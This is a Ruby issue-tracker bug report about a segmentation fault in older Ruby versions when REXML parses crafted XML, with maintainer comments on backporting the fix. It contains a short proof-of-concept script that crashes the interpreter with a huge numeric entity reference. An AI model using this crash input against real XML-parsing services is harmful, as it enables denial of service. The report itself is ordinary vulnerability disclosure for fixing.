Bug #21344
closed
Segment Fault Caused by no Backported Patches
Description
In my local machine(3.2.3 (2024-01-18 revision 52bb2ac0a6) [x86_64-linux-gnu]), which is the default version in ubuntu2404, a segmentation fault can be stably triggered by the poc including malicious xml data.
The poc here:
require "rexml/document"
puts REXML::VERSION
def poc1(size)
input = <<EOF
<mydoc>
<tt>#{'&' + '1'*size + '#x2F3F' + ' '}</tt>
</mydoc>
EOF
parser = REXML::Document.new input
end
poc1(8_999_999)
The issue has been fixed in this commit:
https://github.com/ruby/ruby/commit/b959263b58e26ef630c085f9f7ddc04373a998c7
But the fix haven't been backported to Ruby 3.2 and 3.3.
Based on the developer's response, I think the backporting may be needed so the issue built.
Updated by nobu (Nobuyoshi Nakada) 3 months ago
- Status changed from Open to Closed
- Backport changed from 3.2: UNKNOWN, 3.3: UNKNOWN, 3.4: UNKNOWN to 3.2: REQUIRED, 3.3: REQUIRED, 3.4: DONTNEED
Close to mark for backport.
Updated by nagachika (Tomoyuki Chikanaga) 3 months ago
rexml is already bundled gems in ruby 3.2/3.3.
The users can use any versions of rexml specified with lock file.
Updated by nagachika (Tomoyuki Chikanaga) 3 months ago
Ah, I have misunderstood that the fix was on rexml.gem.
Updated by nagachika (Tomoyuki Chikanaga) 3 months ago
- Backport changed from 3.2: REQUIRED, 3.3: REQUIRED, 3.4: DONTNEED to 3.2: REQUIRED, 3.3: DONE, 3.4: DONTNEED
ruby_3_3 1f226f1efeeae3a5091c60e2f51e027d0598f394 merged revision(s) b959263b58e26ef630c085f9f7ddc04373a998c7.